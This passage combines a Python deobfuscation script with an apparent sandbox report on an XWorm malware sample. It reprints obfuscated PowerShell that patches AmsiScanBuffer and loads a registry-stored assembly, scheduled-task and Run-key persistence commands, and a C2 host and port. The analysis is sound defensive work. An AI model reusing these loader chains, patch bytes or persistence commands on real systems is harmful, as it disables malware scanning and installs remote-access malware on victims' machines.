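    info = {"bytes": buf, "mnemonic": None, "hresult": None, "amsi_e_invalidarg": False}
    if len(buf) == 6 and buf[0] == 0xB8 and buf[5] == 0xC3:   # B8 imm32 = mov eax,imm32 ; C3 = ret
        hres = int.from_bytes(buf[1:5], "little")
        info.update(mnemonic="mov eax, 0x%08x ; ret" % hres, hresult=hres,
                    amsi_e_invalidarg=(hres == E_INVALIDARG))
    return info


def registry_payload(cmd):
    """(subkey, value name) of the registry-stored assembly passed to Assembly.Load, or None."""
    m = REG_LOAD.search(deobfuscate(cmd))
    return (m.group(1), m.group(2)) if m else None


# Constructed, shortened excerpt of the command line from the process tree
# (variable names abbreviated; the obfuscated chains are as they appear on the page).
SAMPLE = r"""$JZL=$mfO.Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+'n'+'e'+[Char](108)+''+'3'+''+[Char](50)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')));
$WIJ=$mfO.Invoke($Null,@([Object]$JZL,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+'l'+''+'P'+'r'+'o'+''+[Char](116)+'e'+[Char](99)+''+'t'+'')));
$SWL=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yud,$BQV).Invoke(''+[Char](97)+'m'+'s'+''+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+'l'+'');
$xjZ=$mfO.Invoke($Null,@([Object]$SWL,[Object]('Am'+[Char](115)+''+'i'+''+'S'+''+'c'+''+[Char](97)+'n'+[Char](66)+''+[Char](117)+''+'f'+''+[Char](102)+''+[Char](101)+'r')));
[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WIJ,$EAv).Invoke($xjZ,[uint32]8,4,[ref]$gRx);
[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$xjZ,6);
[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WIJ,$EAv).Invoke($xjZ,[uint32]8,0x20,[ref]$gRx);
[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+'F'+[Char](84)+''+[Char](87)+'A'+'R'+''+[Char](69)+'').GetValue('Dead'+'s'+''+[Char](116)+''+[Char](97)+'ger')).EntryPoint.Invoke($Null,$Null)"""

if __name__ == "__main__":
    print(recovered_strings(SAMPLE))
    print(decode_patch(SAMPLE))
    print(registry_payload(SAMPLE))
```

On the excerpt this recovers kernel32.dll, VirtualProtect, amsi.dll, AmsiScanBuffer, SOFTWARE and Deadstager, decodes the patch as mov eax, 0x80070057 ; ret, and names HKLM\SOFTWARE\Deadstager as the value to pull from a live host for the next stage. Folding [Char] chains is only one layer; a command that also uses -join, [string]::Format or Base64 needs the corresponding pass added.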

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\Users\Public\DeadXClient.exe" , CommandLine: "C:\Users\Public\DeadXClient.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\DeadXClient.exe, NewProcessName: C:\Users\Public\DeadXClient.exe, OriginalFileName: C:\Users\Public\DeadXClient.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1.exe, ParentProcessId: 4828, ParentProcessName: 1.exe, ProcessCommandLine: "C:\Users\Public\DeadXClient.exe" , ProcessId: 6684, ProcessName: DeadXClient.exe
Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\Public\Deadsvchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\Public\DeadXClient.exe, ProcessId: 6684, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Deadsvchost
Source: Process started | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp) | Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:PwejfaSCJJDP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$vayDTkuWaaLxUU,[Parameter(Position=1)][Type]$fbfUvfPkbf)$SKuzEDmHWUw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+'e'+[Char](99)+''+[Char](116)+'ed'+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+'g'+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+'e'+'m'+'o'+''+'r'+''+[Char](121)+''+'M'+''+'o'+'d'+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+'at'+'e'+'Ty'+[Char](112)+'e',''+[Char](67)+''+'l'+'a'+[Char](115)+'s,P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+''+'l'+'as'+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+'C'+''+'l'+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$SKuzEDmHWUw.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+'m'+[Char](101)+',H'+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+'P'+'u'+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$vayDTkuWaaLxUU).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+[Char](105)+''+'m'+'e,'+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+'e'+'d'+'');$SKuzEDmHWUw.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+''+[Char](98)+'lic'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+''+'g'+''+','+''+[Char](78)+''+'e'+''+'w'+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+',V'+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+'l'+'',$fbfUvfPkbf,$vayDTkuWaaLxUU).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+'im'+'e'+','+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+'g'+''+[Char](101)+'d');Write-Output $SKuzEDmHWUw.CreateType();}$mHgtxYLbOzoJe=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+'.'+'d'+''+'l'+''+'l'+'')}).GetType('M'+[Char](105)+''+'c'+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+'.W'+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+'fe'+[Char](78)+''+'a'+''+'t'+'ive'+'M'+''+'e'+''+'t'+''+[Char](104)+''+'o'+'d'+'s'+'');$mfOCIRUxBUWIVl=$mHgtxYLbOzoJe.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+'r'+''+[Char](111)+'c'+[Char](65)+'d'+[
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:PwejfaSCJJDP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$vayDTkuWaaLxUU,[Parameter(Position=1)][Type]$fbfUvfPkbf)$SKuzEDmHWUw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+'e'+[Char](99)+''+[Char](116)+'ed'+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+'g'+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+'e'+'m'+'o'+''+'r'+''+[Char](121)+''+'M'+''+'o'+'d'+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+'at'+'e'+'Ty'+[Char](112)+'e',''+[Char](67)+''+'l'+'a'+[Char](115)+'s,P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+''+'l'+'as'+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+'C'+''+'l'+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$SKuzEDmHWUw.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+'m'+[Char](101)+',H'+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+'P'+'u'+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$vayDTkuWaaLxUU).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+[Char](105)+''+'m'+'e,'+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+'e'+'d'+'');$SKuzEDmHWUw.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+''+[Char](98)+'lic'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+''+'g'+''+','+''+[Char](78)+''+'e'+''+'w'+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+',V'+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+'l'+'',$fbfUvfPkbf,$vayDTkuWaaLxUU).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+'im'+'e'+','+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+'g'+''+[Char](101)+'d');Write-Output $SKuzEDmHWUw.CreateType();}$mHgtxYLbOzoJe=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+'.'+'d'+''+'l'+''+'l'+'')}).GetType('M'+[Char](105)+''+'c'+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+'.W'+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+'fe'+[Char](78)+''+'a'+''+'t'+'ive'+'M'+''+'e'+''+'t'+''+[Char](104)+''+'o'+'d'+'s'+'');$mfOCIRUxBUWIVl=$mHgtxYLbOzoJe.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+'r'+''+[Char](111)+'c'+[Char](65)+'d'+[
Source: Network Connection | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: DestinationIp: 208.95.112.1, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Public\DeadROOTkit.exe, Initiated: true, ProcessId: 4188, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49729
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\Public\Deadsvchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\Public\DeadXClient.exe, ProcessId: 6684, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Deadsvchost
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\Public\DeadXClient.exe, ProcessId: 6684, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Deadsvchost.lnk
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\Public\DeadXClient.exe" , ParentImage: C:\Users\Public\DeadXClient.exe, ParentProcessId: 6684, ParentProcessName: DeadXClient.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe", ProcessId: 7000, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\Public\DeadXClient.exe" , ParentImage: C:\Users\Public\DeadXClient.exe, ParentProcessId: 6684, ParentProcessName: DeadXClient.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe", ProcessId: 7000, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{ac6bab9f-cf5e-448a-be82-36c64370aff3}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 5644, ParentProcessName: dllhost.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 928, ProcessName: svchost.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:PwejfaSCJJDP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$vayDTkuWaaLxUU,[Parameter(Position=1)][Type]$fbfUvfPkbf)$SKuzEDmHWUw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+'e'+[Char](99)+''+[Char](116)+'ed'+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+'g'+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+'e'+'m'+'o'+''+'r'+''+[Char](121)+''+'M'+''+'o'+'d'+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+'at'+'e'+'Ty'+[Char](112)+'e',''+[Char](67)+''+'l'+'a'+[Char](115)+'s,P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+''+'l'+'as'+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+'C'+''+'l'+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$SKuzEDmHWUw.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+'m'+[Char](101)+',H'+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+'P'+'u'+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$vayDTkuWaaLxUU).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+[Char](105)+''+'m'+'e,'+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+'e'+'d'+'');$SKuzEDmHWUw.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+''+[Char](98)+'lic'+[Ch
ar](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+''+'g'+''+','+''+[Char](78)+''+'e'+''+'w'+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+',V'+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+'l'+'',$fbfUvfPkbf,$vayDTkuWaaLxUU).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+'im'+'e'+','+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+'g'+''+[Char](101)+'d');Write-Output $SKuzEDmHWUw.CreateType();}$mHgtxYLbOzoJe=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+'.'+'d'+''+'l'+''+'l'+'')}).GetType('M'+[Char](105)+''+'c'+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+'.W'+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+'fe'+[Char](78)+''+'a'+''+'t'+'ive'+'M'+''+'e'+''+'t'+''+[Char](104)+''+'o'+'d'+'s'+'');$mfOCIRUxBUWIVl=$mHgtxYLbOzoJe.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+'r'+''+[Char](111)+'c'+[Char](65)+'d'+[
                        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5644, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 6288, ProcessName: svchost.exe

                        Persistence and Installation Behavior

                        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\Public\DeadXClient.exe" , ParentImage: C:\Users\Public\DeadXClient.exe, ParentProcessId: 6684, ParentProcessName: DeadXClient.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe", ProcessId: 7000, ProcessName: schtasks.exe
                        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                        2024-10-22T19:38:22.499718+0200 | 2855924 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49997 | 147.185.221.21 | 28600 | TCP

                        AV Detection

                        Source: aoKTzGQSRP.exeAvira: detected
                        Source: C:\Users\Public\DeadROOTkit.exeAvira: detection malicious, Label: TR/Spy.Gen
                        Source: C:\Users\user\AppData\Local\Temp\1.exeAvira: detection malicious, Label: TR/Dropper.Gen2
                        Source: C:\Users\Public\DeadCodeRootKit.exeAvira: detection malicious, Label: TR/Dropper.MSIL.Gen
                        Source: C:\Users\Public\Deadsvchost.exeAvira: detection malicious, Label: HEUR/AGEN.1305769
                        Source: C:\Users\Public\DeadXClient.exeAvira: detection malicious, Label: HEUR/AGEN.1305769
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeAvira: detection malicious, Label: TR/Redcap.xbbft
                        Source: 00000004.00000002.2208653873.0000000002FE1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["updates-full.gl.at.ply.gg"], "Port": "60075", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.0"}
                        Source: C:\Users\Public\DeadCodeRootKit.exeReversingLabs: Detection: 91%
                        Source: C:\Users\Public\DeadROOTkit.exeReversingLabs: Detection: 81%
                        Source: C:\Users\Public\DeadXClient.exeReversingLabs: Detection: 86%
                        Source: C:\Users\Public\Deadsvchost.exeReversingLabs: Detection: 86%
                        Source: C:\Users\user\AppData\Local\Temp\1.exeReversingLabs: Detection: 73%
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeReversingLabs: Detection: 34%
                        Source: aoKTzGQSRP.exeReversingLabs: Detection: 76%
                        Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Source: C:\Users\Public\DeadROOTkit.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\1.exeJoe Sandbox ML: detected
                        Source: C:\Users\Public\DeadCodeRootKit.exeJoe Sandbox ML: detected
                        Source: C:\Users\Public\Deadsvchost.exeJoe Sandbox ML: detected
                        Source: C:\Users\Public\DeadXClient.exeJoe Sandbox ML: detected
                        Source: aoKTzGQSRP.exeJoe Sandbox ML: detected
                        Source: 7.0.DeadROOTkit.exe.dd0000.0.unpackString decryptor: updates-full.gl.at.ply.gg
                        Source: 7.0.DeadROOTkit.exe.dd0000.0.unpackString decryptor: 60075
                        Source: 7.0.DeadROOTkit.exe.dd0000.0.unpackString decryptor: <123456789>
                        Source: 7.0.DeadROOTkit.exe.dd0000.0.unpackString decryptor: <Xwormmm>
                        Source: 7.0.DeadROOTkit.exe.dd0000.0.unpackString decryptor: USB.exe
                        Source: C:\Users\Public\DeadCodeRootKit.exeCode function: 8_2_00151000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,8_2_00151000
                        Source: aoKTzGQSRP.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                        Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: CMaker 2.0.exe, 00000005.00000002.2263462576.00007FFD93590000.00000040.00000001.01000000.00000017.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000001D.00000002.3467944393.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.2389562882.0000022595840000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000001D.00000002.3467140160.000002259582B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.2389517900.000002259582B000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: d.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000001D.00000002.3467944393.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.2389562882.0000022595840000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: CMaker 2.0.exe, CMaker 2.0.exe, 00000005.00000002.2261490839.00007FFD8F632000.00000040.00000001.01000000.00000011.sdmp
                        Source: Binary string: +@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000001D.00000000.2389517900.000002259582B000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: CMaker 2.0.exe, 00000002.00000003.2153120830.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2269341055.00007FFDA4341000.00000002.00000001.01000000.0000000A.sdmp
                        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: CMaker 2.0.exe, 00000002.00000003.2153120830.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2269341055.00007FFDA4341000.00000002.00000001.01000000.0000000A.sdmp
                        Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000001D.00000000.2389682181.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.3468658414.000002259585D000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: CMaker 2.0.exe, 00000005.00000002.2262592946.00007FFD8FB3B000.00000040.00000001.01000000.00000009.sdmp
                        Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbcache source: svchost.exe, 0000001D.00000000.2389682181.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.3468658414.000002259585D000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: CMaker 2.0.exe, 00000005.00000002.2270072340.00007FFDA5491000.00000040.00000001.01000000.0000000F.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: CMaker 2.0.exe, 00000005.00000002.2267528583.00007FFDA32F1000.00000040.00000001.01000000.0000000C.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: CMaker 2.0.exe, 00000005.00000002.2268863981.00007FFDA3AE1000.00000040.00000001.01000000.00000013.sdmp
                        Source: Binary string: D:\a\1\b\libssl-3.pdbEE source: CMaker 2.0.exe, 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: CMaker 2.0.exe, 00000005.00000002.2265214046.00007FFD9DFAC000.00000040.00000001.01000000.00000019.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 0000001D.00000002.3467944393.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.2389562882.0000022595840000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000001D.00000002.3467944393.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.2389562882.0000022595840000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 0000001D.00000000.2389682181.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.3468658414.000002259585D000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: CMaker 2.0.exe, 00000005.00000002.2269787988.00007FFDA4DA1000.00000040.00000001.01000000.00000014.sdmp
